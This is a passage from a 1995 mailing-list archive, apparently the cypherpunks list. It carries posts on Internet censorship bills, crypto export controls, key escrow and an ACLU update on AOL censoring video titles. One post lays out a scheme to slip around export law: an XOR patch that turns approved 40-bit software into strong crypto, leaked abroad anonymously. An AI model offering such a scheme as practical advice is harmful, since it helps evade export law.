a non-profit public interest organization based in Washington, DC. The Center's mission is to develop and advocate public policies that advance constitutional civil liberties and democratic values in new computer and communications technologies. Contacting us: General information: info at cdt.org World Wide Web: URL:http://www.cdt.org FTP URL:ftp://ftp.cdt.org/pub/cdt/ Snail Mail: The Center for Democracy and Technology 1001 G Street NW * Suite 500 East * Washington, DC 20001 (v) +1.202.637.9800 * (f) +1.202.637.0968 ----------------------------------------------------------------------- End Policy Post No. 31 12/4/95 ----------------------------------------------------------------------- _________________________________________________________________ Return to the Net-Censorship Issues Page Return to the CDT Home Page Below is an open letter to Internet users from Rep. Rick White (R-WA), co-sponsor of the Cox/Wyden/White anti-censorship legislation, discussing his new proposed amendment to the telecom bill, which is now in joint conference committee. As most of you are aware, several amendments to to the bill, many of them conflicting, are to be "reconciled", with the result, constitutional or otherwise, being sent to both houses of Congress for (likely) final approval, and thence to the President for his (at least fairly likely) signature. Among those amendments are several patently unconstitutional proposals, from the original Exon/Coats "Communications Decency Act", to a new, even more censorious amendment supported by the Christian Coalition, Ed Meese, and other representatives of the "religious right". EFF does not endorse any of the proposals that have been floated in the conference committee. We take the position that no content-control legislation should be passed. EFF remains committed to mounting constitutional challenges in court to any such legislation that passes. [begin forward] From: REPWHITE at HR.HOUSE.GOV Date: 04 Dec 1995 22:07:22 EST Subject: An open letter from Rep. Rick White to the Internet Communi To: mech at EFF.ORG Please forward this message to interested members of the Internet community. Thank you. Congressman Rick White -- AN OPEN LETTER TO THE INTERNET COMMUNITY December 4, 1995 To members of the Internet Community and Concerned Citizens: For the past several months, I have closely followed the online debate over Congressional attempts to impose content controls on the Internet. Your phone calls, letters, and email were instrumental in convincing 420 of my House colleagues to support the Cox/Wyden/White "Internet Freedom and Family Empowerment Act." As you may know, on Wednesday, December 6th, the Telecommunications Reform Legislation Conference Committee, of which I am a member, will choose between two competing proposals: one offered by my colleague, House Judiciary Committee Chairman Henry Hyde (R-IL), and my own proposal. I believe that the decision we reach on Wednesday will have a significant impact on the future of the Internet. While many of us who use the Internet feel that Congress should steer clear of any new regulation of the Internet and online information services, the reality is that proponents of more severe restrictions on online content have been successful in convincing many in Congress that new regulations are necessary. The conference committee is charged with reconciling several competing approaches to addressing children's access to objectionable material online. In June, the Senate, by an overwhelming majority passed the Exon/Coats "Communications Decency Act." In August, the House passed the Cox/Wyden/White "Internet Freedom and Family Empowerment Act," which emphasized parental empowerment over government content regulations. At the same time, the House also approved a new indecency crime sponsored by Chairman Hyde. As an avid Internet user and a strong believer in the enormous potential of cyberspace to educate, expand commercial opportunities, and create jobs, I have developed an alternative proposal that I expect to offer to conferees on Wednesday. My proposal will ensure freedom of speech and encourage the development of technological tools to help parents prevent their children from accessing inappropriate material online. It would also prohibit the Federal Communications Commission from controlling online content and from meddling in the underlying technologies of the net. In addition, my proposal will create tough penalties for those few bad actors who send truly objectionable material directly to minors or display such material. However, those who make good faith, reasonable efforts to label content and enable it to be blocked or filtered by parental control technologies (such as the PICS standards currently being developed by MIT and the World Wide Web Consortium) would be immune from prosecution. Briefly, my proposal: * Substitutes the narrow, "harmful to minors" standard instead of the broad, vague, and constitutionally suspect "indecency" standard. The "harmful to minors" standard refers to material that is sexually explicit and, taken as a whole, lacks serious literary, artistic, political or scientific value for minors. * Prohibits the Federal Government from regulating online content or from having oversight over the underlying technologies of the net. * Would prohibit displaying material that is "harmful to minors," but create immunity for those who make good faith and reasonable efforts to implement parental empowerment technologies that enable screening of unwanted content. * Would not impose liability on online service providers merely for transmitting the messages of their users. At this time, the only option for the conference committee is to choose between the White proposal or the Hyde substitute amendment. As the only option that minimizes government intrusion on freedom of speech, relies on parents to make their own choices about what material comes into their homes, and prevents the FCC from imposing regulations on online content, I hope you, as well as my colleagues in Congress, will agree with my approach. Sincerely, /s/ Rick White Member of Congress ************************************************* http://www.house.gov/white/welcome.html repwhite at hr.house.gov ************************************************* [end forward] -- Stanton McCandlish
mech at eff.org

Electronic Frontier Foundation

Online Activist From KLEMEN at lj-oz.sik.si Wed Dec 6 16:14:53 1995 From: KLEMEN at lj-oz.sik.si (KLEMEN RAMOVES) Date: Wed, 6 Dec 95 16:14:53 PST Subject: unsuscribe Message-ID: <01HYIAGKS0OI0006XT@arnes.si> plz..unsuscribe me.. klemen at lj klemen at Lj -oz.sik.si KleMeN From m5 at dev.tivoli.com Wed Dec 6 16:28:06 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Wed, 6 Dec 95 16:28:06 PST Subject: Solution for US/Foreign Software? In-Reply-To: <199512062336.PAA13979@ix6.ix.netcom.com> Message-ID: <9512070028.AA01359@alpha> Bill Stewart writes: > I had interpreted the suggestion differently - rather than a system with > user-accessible crypto hooks, the manufacturer could ship a binary patch > upgrade for US customers to install. The internal design would presumably > have crypto hooks (i.e. subroutine calls); they can't ban that. No, they can't *ban* it, but there's no reason to suspect that they won't revoke the export license after the scheme becomes clear. And of course the patch itself would not be exportable. If there's a "wink wink nudge nudge" implication that the patch would make its way overseas, I don't understand why that's really any more likely than the US-only version getting out. Note that the USGov puts definite explicit heat on corporations to make it clear that they're serious about this stuff. The responsible VP for such things at one company with which I'm familiar was explicitly reminded that he could personally be held criminally liable for any transgressions of the export laws. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From jya at pipeline.com Wed Dec 6 16:36:48 1995 From: jya at pipeline.com (John Young) Date: Wed, 6 Dec 95 16:36:48 PST Subject: SEQ_uel Message-ID: <199512070037.TAA07593@pipe4.nyc.pipeline.com> Science, Dec 1, 1995. "The Evolution of Molecular Computation." By Willem Stemmer. Comments on the limitations of Leonard Adleman's and Richard Lipton's DNA-computation research compared to the utility of sequence evolution computation. Although DNA sequencing of the selected solutions poses a practical problem for molecular computation, this drawback does not exist for computation with genetic algorithms or for in vitro evolution or computer simulations of natural evolution, called artificial life. Sequence evolution appears to be a useful general tool for solving many complex problems, whether the solution is a number, sequence, program, or structure. SEQ_uel (6 kb) From jsw at netscape.com Wed Dec 6 17:19:21 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Wed, 6 Dec 95 17:19:21 PST Subject: Why Netscape employees should not leave In-Reply-To: <199512040002.AA08103@ideath.goldenbear.com> Message-ID: <30C64034.6323@netscape.com> Adam Shostack wrote: > This leaves us to ask, why GAK is such a big deal at NIST, if > CKE will get them most of what they want? First, they haven't > realized that CKE is most of what they want. Second, they're worried > about the extra 10%. Drug dealers and terrorists not using it. (This > points towords an eventual mandate for GAK, even if it starts out > voluntary. Many have noted this.) Third, they've invested so much > energy in the fight for GAK that they're emotionally tied to the idea, > and they can't say 'well this would be almost as good.' It also allows them to stall on increasing the clearly inadequate export key size of 40-bit, while they are working on "an alternate solution". Given the overwelming negative response from industry over GAK, it may be nothing other than a delaying action. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From daw at boston.CS.Berkeley.EDU Wed Dec 6 17:25:52 1995 From: daw at boston.CS.Berkeley.EDU (David A Wagner) Date: Wed, 6 Dec 95 17:25:52 PST Subject: Solution for US/Foreign Software? Message-ID: <199512070125.UAA16598@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199512062229.RAA16714 at universe.digex.net>, Scott Brickner wrote: > > I agree. It does bring to mind an idea, though. Netscape builds an > exportable system by choosing a random 128 bit number and then just > including 88 bits of it in plaintext. > > This means one of two things. Either there's a field which holds the > "key", but the export version stores 88 bits plain + 40 bits cipher, > and knows this structure, or there's a field which holds the 128 bit > enciphered key, and a second field which holds the 88 bits of plaintext > key. > It's the former (in SSL v2.0). I looked into this, because the former version can be vulnerable to related-key attacks, if not done right. SSL v2.0 does it right. (In particular, SSL v2.0 hashes both the 88 bit salt + 40 bit secret to get all the cipher keys.) > > In the former, the patch would be more significant, but still possible. > You'd disable the "write the plain" part and extend the "decode the > cipher" part to decode all 128 bits --- probably just a loop test. > (And you'd have to change the cipher type from RC4-40 to RC4-128.) Or write a local proxy to convert from RC4-40-salted to RC4-128. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMMZCbSoZzwIn1bdtAQF9xAGAqkg5VzChucF3FasK2pYVxg1D5F3lsnSP CFWsp+MbXKqTe71iznBvtg246xWPLohe =XM3W -----END PGP SIGNATURE----- From jsw at netscape.com Wed Dec 6 17:39:18 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Wed, 6 Dec 95 17:39:18 PST Subject: News on Congressional Debate on Exon In-Reply-To: <9512062040.AA20810@toad.com> Message-ID: <30C644E3.72CE@netscape.com> Peter Trei wrote: > Actually, I've been thinking about this quite a bit recently. I'm building > an SSL enabled server, and clent-side authentication may provide > some help. I could see a user getting his or her public key certificate > signed with different CA keys which assert any number of conditions, > such as: > > Key holder was born before (some particular date). > Key holder has access to sales data for XYZ corp. > Key holder is an adult who takes the first amendment seriously. > > ... and the server would recognize different CA signatures as permitting > different levels of access. This can be done with x509v3 certificate extensions. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From shamrock at netcom.com Wed Dec 6 17:48:37 1995 From: shamrock at netcom.com (Lucky Green) Date: Wed, 6 Dec 95 17:48:37 PST Subject: News on Congressional Debate on Exon Message-ID: Tim wrote: >>If the Exon Bill really does go into effect, and age limits on access are >>imposed, I'll be looking for what we've always joked about: the >>"Information Superhighway Driver's License." To be perfectly honest, whenever I talked about this topic I wasn't joking. Prepare to see "felony Internet access" on the books before long. -- Lucky Green PGP encrypted mail preferred. From wilcoxb at taussky.cs.colorado.edu Wed Dec 6 17:57:24 1995 From: wilcoxb at taussky.cs.colorado.edu (Bryce) Date: Wed, 6 Dec 95 17:57:24 PST Subject: My conception of the ideal encryption tool for the masses In-Reply-To: <199512060918.DAA06957@proust.suba.com> Message-ID: <199512070158.SAA11862@taussky.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- Alex Strasheim wrote: > > I don't know what blancw was getting at, but I'll take up his side of the > argument. Can good security really be automated so well that people will > have it without thinking about it? > > I create accounts at an ISP, and 90% of the people who walk in the door > pick terrible passpwords, even after listening to a little speech about > what makes a good one. I'd be willing to bet that more than half the > people using PGP have passphrases that would fall quickly to a dictionary > attack. Yes, but even if your PGP passphrase is "pass", using PGP gives you excellent security against anyone who can't get access to your secret key. I envision "Joe User" security as a pocket-computer That has very limited capability. Basically it can input data (but not executable code!), put Joe's authentication-stamp (a.k.a. "signature", although that's a misnomer) on that data, and output it. It only does this in response to some kind of authentication-action from Joe himself. Perhaps he inputs a 4-digit PIN. (It should be designed so that he can keep the PIN-input-device out of sight, say in his pocket, while using it.) Furthermore it should have an amnesia function where brute-forcing the PIN fails (possibly wiping the secret key) and a duress code PIN which fakes normal operation. (Possibly the duress code replaces all the incoming data with "HELP I'M BEING HELD UNDER DURESS!" before stamping it and outputting it, then wipes the secret key and continues to operate in fake mode.) And of course its hardware should be "tamper-resistant" for whatever that's worth. I guess it should have a one-time function (burnable ROM or whatever) which generates the secret key so that Joe can generate the key himself rather than having it done at the factory. It would be nice if Joe could make a back-up of his secret key, but I don't see anyway to do that without weakening the protection on it. Does this sound like something Joe could learn how to use properly, and trust enough to store a few hundred dollars in? He can choose his PIN himself and his duress PIN can be a variation of the normal one. One problem is that Joe can't necessarily tell what information is being fed into his "stamper" to be stamped. Possibly it could have an LCD display for that purpose... Hopefully it is apparent what kind of use this tool can be put to. For example, Joe picks up a a carton of milk at the grocery store, the store's cash register submits a bill for $2.00 to Joe's stamper, which stamps it, and Joe leaves. The grocer can submit Joe's signed IOU to Joe's bank at his/her leisure later. Variations on this theme. The main issue is how Joe can keep track of what information his is stamping. Regards, Bryce signatures follow "To strive, to seek, to find and not to yield." -Tennyson bryce at colorado.edu -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01 iQCVAwUBMMZKHPWZSllhfG25AQEbSgP9HOYLQtCuEiok/JCvxHnq1Xxvx7aeXZH9 8OaC0GPEPFFNSnjerLTcvkbrn04JjHNBC10eMx3I8/jSTB6817M+M8+aTzqC44rH m2krfLCOMPXXHejDJgzPn/OlsLRKzi1HgeiHphpL1NGoRyNk+mKzBmq59EbvOqeF aSrF6QuEEpw= =rHnb -----END PGP SIGNATURE----- From germans at exodus.dgsca.unam.mx Wed Dec 6 17:59:31 1995 From: germans at exodus.dgsca.unam.mx (German Santos Jaimes) Date: Wed, 6 Dec 95 17:59:31 PST Subject: unsuscribe In-Reply-To: <01HYIAGKS0OI0006XT@arnes.si> Message-ID: unsuscribe From tcmay at got.net Wed Dec 6 18:26:14 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 6 Dec 95 18:26:14 PST Subject: unsuscribe Message-ID: First, Mary Rose wrote: >unsuscribe And then KLEMEN RAMOVES wrote: plz..unsuscribe me.. klemen at lj klemen at Lj -oz.sik.si I sanse a patern, a change in the Englash linguage that I seem to have mist. Hmmhhh.... --Tiim Mae, Cyperponk Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From kharyp at earthlink.net Wed Dec 6 18:29:57 1995 From: kharyp at earthlink.net (KHARY PENEBAKER) Date: Wed, 6 Dec 95 18:29:57 PST Subject: list Message-ID: <199512070228.SAA19607@iceland.it.earthlink.net> put me on the list From ACLUNATL at aol.com Wed Dec 6 19:19:18 1995 From: ACLUNATL at aol.com (ACLUNATL at aol.com) Date: Wed, 6 Dec 95 19:19:18 PST Subject: ACLU Cyber-Liberties Update: 12/6/95 Message-ID: <951206165626_46587199@emout06.mail.aol.com> ---------------------------------------------------------------- December 6, 1995 ACLU CYBER-LIBERTIES UPDATE A bi-weekly e-zine on cyber-liberties cases and controversies at the state and federal level. ---------------------------------------------------------------- IN THIS ISSUE: * ACLU Announces Plans to Challenge Online Censorship Provisions in Court; Says That House Conference Vote Leaves No Other Options * AOL Censors Gay Video Titles, Finds "Buns" Acceptable but "Studs" Too Sleazy * ACLU Speaks on Cyber-Liberties ---------------------------------------------------------------- FEDERAL PAGE (Congress/Agency/Court Cases) ---------------------------------------------------------------- * ACLU Announces Plans to Challenge Online Censorship Provisions in Court;Says That House Conference Vote Leaves No Other Options FOR IMMEDIATE RELEASE Contact: Phil Gutis 202-675-2312 WASHINGTON -- Saying that it could not depend on Congress to protect free speech on the Internet, the American Civil Liberties Union said today that it would challenge in court any of the online censorship proposals now being considered by a House-Senate conference committee. In a vote today, the House members of the Congressional conference committee on the telecommunications bill betrayed their chamber's earlier vote to reject censorship on the Internet. "All of Congress's proposals violate the First Amendment and privacy rights of adults to communicate freely in the online environment," said Barry Steinhardt, ACLU Associate Director. "Congress is making it ever more clear that we will have to turn to the courts to uphold free speech in the promising new medium of cyberspace." The ACLU rejected as unconstitutional the proposals offered by Senator J. James Exon, D-Nebraska, Senator Charles E. Grassley, R-Iowa, and Representative Henry Hyde, R-Illinois, as well as the one offered by Representative Rick White, R-Washington. The House conferees voted today on how to respond to the Senate's provisions on Internet censorship. Although they first adopted the White censorship proposal -- which the media widely and inaccurately portrayed as a compromise -- they then amended it to include the Senate's standard for censorship. Last August, the House won widespread praise from the online community when it adopted an amendment to encourage Internet providers to better develop screening technologies for parents to use in controlling what their children see in cyberspace. House Speaker Newt Gingrich went as far as to call the Senate version of the legislation a clear "violation of free speech" and a "violation of the right of adults to communicate with each other." Unfortunately," said ACLU Legislative Counsel Donald Haines, "the House members graciously accepted their applause for opposing censorship and then, in a legislative slight of hand, turned right around and came up with their own scheme to censor what people say and see on the Internet." The ACLU said that it would continue to work in Congress to keep the Internet free. "Regardless of how the bill turns out," said Haines, "both the House and Senate need to continue to hear that their censorship is simply not acceptable." The House conferee's vote today removes the best chance that a telecommunications bill will emerge without an Internet censorship provision, the ACLU said. "If Congress adopts either the White or Exon censorship schemes -- which appears increasingly likely -- they will force us to turn to the Courts and we will sue," Steinhardt said. More than 25 civil liberties groups, regional Internet service providers, and commercial producers of entertainment, information, and journalism joined an ACLU letter, delivered earlier today, that urged the conferees to reject all proposals to impose new government censorship regulations on cyberspace and online communications. The ACLU said that, interestingly enough, the groups and individuals who are eager to challenge the censorship provisions should they become law have communicated with the ACLU via the Internet. Online political columnists, distributors of gay and lesbian resources, human rights groups, academic researchers of human sexuality, AIDS education groups, prisoners' rights groups, and student groups with controversial web pages have all already approached the ACLU about being plaintiffs in a court challenge. The groups said that they fear prosecution because they use online services to post, exchange, or distribute material that could be deemed "indecent" under the proposed law. ------------------------- For a copy of the coalition letter sent to the conferees, send a message to infoaclu at aclu.org with "letter opposing White and Hyde" in the subject line. The following organizations signed the letter: American Civil Liberties Union American Booksellers Foundation for Free Expression American Communication Association Art and Technology Society Association of Alternative Newsweeklies Boston Coalition for Freedom of Expression Coalition for Academic Freedom of Expression, Carnegie Mellon University Council of Literary Magazines and Presses Datalytics, Inc. Electronic Privacy Information Center Feminists for Free Expression Filz and Associates, Inc. HotWired Magazine Human Rights Watch Justice on Campus Project Internet Users Consortium LitNet (The Literary Network) Lumberyard BBS Community Network MIT Student Association for Freedom of Expression Media Democracy in Action Consortium (MeDIA Consortium) National Campaign for Freedom of Expression National Coalition Against Censorship National Writers Union NorthWest Feminist Anti-Censorship Taskforce Oregon Coast Rural Information Service Cooperative Pacific Online Access Public Access Networks Corp. (Panix) The Society for Human Sexuality, University of Washington Wired Magazine ---------------------------------------------------------------- STATE PAGE (Legislation/Agency/Court Cases) ---------------------------------------------------------------- * AOL Censors Gay Video Titles, Finds "Buns" Acceptable but "Studs" Too Sleazy AOL customers won't be surprised to hear that the AOL censors are at it again. AOL has long had a policy of screening certain "dirty words" from its public bulletin boards and chat groups. Last week, The Boston Globe reported that AOL had banned the word "breast." The company agreed to reverse the policy after "several days of on-line protests by irate breast cancer patients." Richard A. Knox, "Women Go Online To Decry Ban On Breast,'" The Boston Globe, 12/1/95. Another example of AOL's attempt to use censorship to create a "family-friendly" service was recently brought to the ACLU's attention. Jeff Satkin is owner and operator of ATKOL Gay Videos, a mail-order gay video store headquartered in Plainfield, NJ. Last August, Jeff responded to AOL's bid for new business by signing up as an advertiser on "Downtown AOL" (DT AOL). AOL describes the site as "a virtual small business community where potential customers will come to browse and shop for products and services of all types." Jeff paid the advertising fee and sent AOL an electronic copy of his extensive mail-order video catalog for posting on the DT AOL site. Under the contract, AOL agreed to run the ad for a term of one year. According to Jeff, AOL posted the catalog in full for four weeks with no complaints. Then, in September, AOL sent Jeff a letter requesting that a huge percentage of titles in the ATKOL Video mail-order catalog be removed from the online version of the catalog that appeared on Downtown AOL. An AOL employee had gone through a printed version of the list and highlighted the offending titles that would need to be removed. The result is a hilarious but frightening example of arbitrary censorship. At the ACLU's suggestion, Jeff wrote to AOL and asked them to explain the guidelines they used for censoring his catalog. After considerable delay, AOL wrote back the following: "DT AOL does not have any written standards for its advertisements. As the manager of the area I determine whether an advertisement has the look and feel that best fits our environment. I edited the file you sent and removed any titles which I felt didn't reflect the image we would like to project. I may have missed a few as you pointed out, so feel free to remove those as well if you would like." Here are just a few examples of AOL's arbitrary rating system as applied to the ATKOL Video catalog. (And remember, these are **titles only**!! -- no pictures, no cover art, no narrative -- just titles.) AOL Says AOL Says "Thumbs Down" -- "Thumbs Up" -- These titles were censored as These titles were not censored -- too sleazy for AOL!: they must have had "the look and feel that best fits the AOL environment": A Brother's Desire A Family Affair Advanced Disrobics Lockerroom Fever All About Sex ABC's of Sex All the Right Stuff All Men Do It! As the Bed Turns Bed Tales Bare Bones Bareback Bedroom Eyes Bedroom Lies Bi N Large Bi-Conflict The Big Nasty The Big Drill Bigger Than Huge Bigger Than Life Black Magic Magic Choices Black Dudes Blond Lovers The Boy Next Door Boys from New Jersey Brotherly Love Brother Trouble Buns N Hoses Bung Hole Buddies Dirty Pictures Dirty Picture Show Elements of Passion Passion By Fire Everybody Does It Every Which Way Filth Dirty Laundry Gayracula Gay Tarzan Hot Lunch Hot Stuff Latin on the Loose Latin Lust Leather Angel Leather Report Man in Motion The Man Inside Men in Shorts Men with Tools Night Maneuvers Nights in Black Leather Power Grip Power Trip Rican Christmas Latino Nights The Rites of Spring The Rites of Summer Skin Deep Skin Tight Spring Semester Spring Break Sunday Brunch Summer Heat Tough and Tender Tough Iron White Trash White on White Wild Dreams Wild Thing You Are Not Alone Alone and Private Titles with any of the following words, regardless of the full title, were also censored: "pleasure," "black," "hard," "boys," "jock," "Rican," "sex," "stud," "straight," "young." A few more interesting facts about the case should be noted. First, while AOL has never publicized the list of "vulgar" words that it routinely screens from its public sites, most of the screened words are classic profanity and "dirty words." None of the titles that AOL censored from ATKOL Video's list contain those "dirty" words. Second, it is clear that AOL's action was an overreaction to the recent federal law enforcement raids on alleged child pornographers using AOL -- Jeff received the letter shortly after the raids made the headlines. But *none* of Jeff's videos contain child porn. And again -- the info in the catalog was *titles only* and contained no substantive material at all. Third, it appears that AOL's arbitrary standards may be a little homophobic. While "Wet and Wild" was an unacceptable title in a gay video catalog, AOL ran an ad in Downtown AOL for Affinity Teleproductions, Inc. that read: "Now you can join exotic Anna Nicole Smith on her sensuous Edenquest adventure in her exclusive photo portfolio. . . . Anna Nicole Smith "The Collectors Set" features ten eye opening Edenquest photographs in vivid color . . . . It's all Anna Nicole Smith wet and wild drenched in sun and powder sugar sand. "With Love, Anna Nicole" is your personal trip to paradise with the world's most exciting woman in her most provocative photos ever." The troubles experienced by ATKOL Video when it legitimately tried to do business with AOL just proves once again that censorship rules are by nature arbitrary and unfair -- whether imposed by the government or by private industry. ---------------------------------------------------------------- ACLU Speaks on Cyber-Liberties ---------------------------------------------------------------- 12/5/95 Nadine Strossen, President of the ACLU, debated Kathy Cleaver of the American Family Research Council over online censorship proposals on CNN's "Crossfire." 12/5/95 Barry Steinhardt, Associate Director of the ACLU, debated Bob Peters of Morality and Media over online censorship proposals on CBS Radio Network's Gil Gross Show. 12/7/95 Ann Beeson, ACLU cyberspace policy analyst, speaks on a panel at the Walker Art Center in Minneapolis, Minnesota. "Art on the Internet: Power, Access and Desire," 7:30 p.m. See http://bowlingalley.walkerart.org/. Next week: Watch the CNBC 6:00 pm news for an interview with Barry Steinhardt on Congress' proposals to censor the net. ---------------------------------------------------------------- ONLINE RESOURCES FROM THE ACLU NATIONAL OFFICE ---------------------------------------------------------------- Stay tuned for news on the ACLU's world wide web site, under construction at http://www.aclu.org. America Online users should check out our live chats, auditorium events, *very* active message boards, and complete news on civil liberties, at keyword ACLU. ---------------------------------------------------------------- ACLU Cyber-Liberties Update Editor: Ann Beeson (beeson at aclu.org) American Civil Liberties Union National Office 132 West 43rd Street New York, New York 10036 To subscribe to the ACLU Cyber-Liberties Update, send a message to infoaclu at aclu.org with "subscribe Cyber-Liberties Update" in the subject line of your message. To terminate your subscription, send a message to infoaclu at aclu.org with "unsubscribe Cyber-Liberties Update" in the subject line. For general information about the ACLU, write to infoaclu at aclu.org. ---------------------------------------------------------------- From pfarrell at netcom.com Wed Dec 6 19:55:13 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Wed, 6 Dec 95 19:55:13 PST Subject: NIST GAK export meeting, short version Message-ID: <82563.pfarrell@netcom.com> Bill Stewart writes: > Maybe this is just an artifact of Pat's wording, but this sounds > like there may be classified court orders other than FISA? You are reading more into my writing than I intended. I know of no other classified court than FISA. But A. Michael Froomkin noted that my best friend Geoff's slide said "(e.g. FISA)" and asked, since you used "e.g." what are the others? Geoff mumbled and rambled. I took it as a no comment. There were a bunce of lawyers there, including Sobel from EPIC, Danny W from CDT, etc. Perhaps they know of more than I do, I'm just a techie. >> Plus, since you have to be a US citizen to get a clearence, >> how can there be approved foreign escrow agents? > By deals with the foreign governments, presumably reciprocal. Deals are, of course, possible. But right now, a clearence means US Citizen. AFAIK, the only legal discrimination allowed in employement ads is "US Citizenship required" which is code for "clearence required" >>And the usual, why in hell would a competent spy use >> crypto escrowed in the US? > Competent spies appear to be a surprisingly small fraction of > even government-employed espionage personnel OK, I'll grant you that there arn't many of them. Still, why you don't address my question: why use it if you have an IQ above air temperature? You traffic and low visibility ideas have merit, but why open up to FISA? > And sometimes you're just stuck on the Beltway and have to use your > car phone to say you'll be a bit late dropping off the secret plans. You left out the :-) Actually, you'd have appreciated the November DC-cypherpunks meeting, we spent a couple hours driving arround, mapping spook facilities. Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From jimbell at pacifier.com Wed Dec 6 20:19:17 1995 From: jimbell at pacifier.com (jim bell) Date: Wed, 6 Dec 95 20:19:17 PST Subject: Solution for US/Foreign Software? Message-ID: At 03:36 PM 12/6/95 -0800, you wrote: >>>>1. Write a program with limited encryption (40 bit?), with the encryption >>>>module in a file external to the main program. >>>>2. Get export approval for this program. >>>>3. Write a module which replaces the encryption file, increasing key size >>>>to whatever you REALLY wanted in the first place. (128-bit IDEA, 2000-bit >>>>PGP, etc.) >>>>4. Ship that new module with the old software to US customers. >>>>Naturally, that new module will "leak," so anybody who buys the old > >Tim May replied >>>"Crypto hooks," basically the scheme you are proposing, were thought of by >>>the authorities and are not a bypass of the crypto export laws. > >I had interpreted the suggestion differently - rather than a system with >user-accessible crypto hooks, the manufacturer could ship a binary patch >upgrade for US customers to install. The internal design would presumably >have crypto hooks (i.e. subroutine calls); they can't ban that. > >Of course, if you follow this strategy, get export approval for version 1.0, >and ship the US-only patch as 1.1, getting export approval for version 2.0 >may be a shade more difficult... And you get the prize because YOU guessed right! Sorry if I wasn't more clear. My premise: Every program of length "n" bytes is simply an XOR away from every OTHER program of length "n" bytes. If one of those programs is the export-allowed program and the other is the export-forbidden program, the XOR file is the difference between them. The "only" problem is to generate the "XOR" file and get it out of the country. The "getting it out of the country" part is easy and will presumably happen because somebody not known to the company does it. At that point, the only problem is authentication: This can be done easily using existing PGP digital signatures. Obviously, only one copy of the XOR file needs to be exported, at least per revision. It is arguable that the export of that XOR file is illegal; so be it. It would be exported by an unknown person, using an unknown method, and uploaded anonymously to a foreign server, all without the knowledge, cooperation, or approval of the company. From anonymous-remailer at shell.portal.com Wed Dec 6 20:22:42 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Wed, 6 Dec 95 20:22:42 PST Subject: [FYI] FBI Training Eastern European Police Message-ID: <199512070422.UAA22589@jobe.shell.portal.com> Dave Del Torto wrote: > FBI School Teaches New Tricks to Old Enemies ... > In matching navy blue polo shirts, the students sat transfixed as > they watched slides showing the destruction of the Oklahoma City and > World Trade Center bombings. > > "God forbid you should ever have anything like this happen over > here," American instructor Ed Burwitz told his Central European > class, outfitted with headphones for simultaneous translation of the > lecture. "It is a tough task for any > freedom-loving country to prevent terrorism," he added. ... > The United States fronted $2.5 million to renovate the campus, which > includes a brand-new gym, classrooms, dormitories and one of > Hungary's few indoor tennis courts. The Hungarian government > contributed $500,000 to renovate the facility, > but the U.S. will pay the $3.5 million yearly cost to operate the > center, which is modeled after the law enforcement training center in > Quantico, Va. > > Students from Hungary, Russia, Poland, the Czech Republic and other > Central and Eastern European nations attend ILEA's 8-week sessions, > the first of which began in April. > > The idea is to help the Eastern Europeans with their burgeoning > crimes problems, as well as to foster cooperation on international > crime problems. This sounds like a capital idea. I'm certain that the FBI and other law-enforcement officials might also learn by living in a city where the East truly meets the West. Budapest is a beautiful old city of bridges, not just literally but figuratively. It's where anyone in the world can find comfort. Americans, French, German, Syrian ... all can use it for transit. And the annual Grand Prix is one heck of a car race as well. An international grand-luxe congregation opportunity. Burwitz probably doesn't consider Budapest a hardship post. Especially if he found himself a shack up in the hills of Buda on Rose Hill. > "I'm amazed at the freedom of travel that is possible" after the > opening up of the Eastern nations, Burwitz said. But "that means > criminals can travel as well," he said, allowing them to traffic > drugs and contraband. "The more interaction we have with these > countries in law enforcement, the better it will be for emerging > democracies," Kaciban said. If Burwitz is concerned with emerging democracies, he might profit from reading some briefing papers, and leaving some of his pre-conceptions at the door. Especially, if he plans on getting full value from his visit. True bang for the buck, as it were. Hungary has always been open to "free travel". That's why they had a Hilton and an Inter-Continental in Budapest. In fact, the "collapse" of the Berlin Wall -- which was missed by most intelligence agencies -- was a direct result of free travel on the far side of the "Iron Curtain". There was always travel freedom within COMECON. There had to be. Truckers as an example traveled throughout the East. And there were always family vacations as well. What was missing was a way to have large population movements from East to West. Migration. Hungary solved that problem when it opened its border with its historic ally-cum-subjugator, Austria. Hungary's boldness allowed East Germans -- skilled East Germans -- to exit in large number to Austria during their ostensible "vacations" to Hungarian resorts. They transited Austria to West Germany where they had guaranteed citizenship, and were assured employment because of their skill-set. This massive population flow of skilled workers is what ultimately lead to East German collapse and the subsequent German re-unification. It was Hungarian and Austrian policy co-operation that allowed Germany to re-join its two halves. A co-operation that flowed from an extended period of Austrian investment in Hungarian enterprise. (I guess Germany owes Hungary one for that.) But the "unification" does lead to some interesting problems, as the non-migratory East German population -- the ones whose skills were not as marketable; or alternatively, those who 